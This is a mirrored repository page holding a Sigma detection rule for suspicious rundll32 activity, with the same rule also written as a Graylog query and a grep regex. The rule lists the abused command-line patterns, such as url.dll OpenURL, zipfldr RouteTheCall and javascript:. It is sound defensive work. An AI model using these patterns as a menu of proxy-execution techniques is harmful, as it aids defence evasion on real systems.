atomic-threat-coverage/win_susp_rundll32_activity.md at d99f01b7735a4cbda88165263043b35488ff069f

mirror of https://github.com/valitydev/atomic-threat-coverage.git synced 2024-11-06 09:35:21 +00:00

Wydra Mateusz d99f01b773 get rid of dot workaround for markdown, missing analitics added

2019-05-01 23:43:17 +02:00

5.1 KiB

Raw Blame History

Title	Suspicious Rundll32 Activity
Description	Detects suspicious process related to rundll32 based on arguments
ATT&CK Tactic	TA0005: Defense Evasion TA0002: Execution
ATT&CK Technique	T1085: Rundll32
Data Needed	DN_0002_4688_windows_process_creation_with_commandline DN_0003_1_windows_sysmon_process_creation
Trigger	T1085: Rundll32
Severity Level	medium
False Positives	False positives depend on scripts and administrative tools used in the monitored environment
Development Status	experimental
References	http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ https://twitter.com/Hexacorn/status/885258886428725250 https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
Author	juju4

Detection Rules

Sigma rule

title: Suspicious Rundll32 Activity
description: Detects suspicious process related to rundll32 based on arguments
status: experimental
references:
    - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
    - https://twitter.com/Hexacorn/status/885258886428725250
    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
tags:
    - attack.defense_evasion
    - attack.execution
    - attack.t1085
author: juju4
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - '*\rundll32.exe* url.dll,*OpenURL *'
            - '*\rundll32.exe* url.dll,*OpenURLA *'
            - '*\rundll32.exe* url.dll,*FileProtocolHandler *'
            - '*\rundll32.exe* zipfldr.dll,*RouteTheCall *'
            - '*\rundll32.exe* Shell32.dll,*Control_RunDLL *'
            - '*\rundll32.exe javascript:*'
            - '* url.dll,*OpenURL *'
            - '* url.dll,*OpenURLA *'
            - '* url.dll,*FileProtocolHandler *'
            - '* zipfldr.dll,*RouteTheCall *'
            - '* Shell32.dll,*Control_RunDLL *'
            - '* javascript:*'
            - '*.RegisterXLL*'
    condition: selection
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: medium

es-qs

xpack-watcher

graylog

CommandLine:("*\\\\rundll32.exe* url.dll,*OpenURL *" "*\\\\rundll32.exe* url.dll,*OpenURLA *" "*\\\\rundll32.exe* url.dll,*FileProtocolHandler *" "*\\\\rundll32.exe* zipfldr.dll,*RouteTheCall *" "*\\\\rundll32.exe* Shell32.dll,*Control_RunDLL *" "*\\\\rundll32.exe javascript\\:*" "* url.dll,*OpenURL *" "* url.dll,*OpenURLA *" "* url.dll,*FileProtocolHandler *" "* zipfldr.dll,*RouteTheCall *" "* Shell32.dll,*Control_RunDLL *" "* javascript\\:*" "*.RegisterXLL*")

splunk

logpoint

grep

grep -P '^(?:.*.*\\rundll32\\.exe.* url\\.dll,.*OpenURL .*|.*.*\\rundll32\\.exe.* url\\.dll,.*OpenURLA .*|.*.*\\rundll32\\.exe.* url\\.dll,.*FileProtocolHandler .*|.*.*\\rundll32\\.exe.* zipfldr\\.dll,.*RouteTheCall .*|.*.*\\rundll32\\.exe.* Shell32\\.dll,.*Control_RunDLL .*|.*.*\\rundll32\\.exe javascript:.*|.*.* url\\.dll,.*OpenURL .*|.*.* url\\.dll,.*OpenURLA .*|.*.* url\\.dll,.*FileProtocolHandler .*|.*.* zipfldr\\.dll,.*RouteTheCall .*|.*.* Shell32\\.dll,.*Control_RunDLL .*|.*.* javascript:.*|.*.*\\.RegisterXLL.*)'

5.1 KiB Raw Blame History

Detection Rules

Sigma rule

es-qs

xpack-watcher

graylog

splunk

logpoint

grep

5.1 KiB

Raw Blame History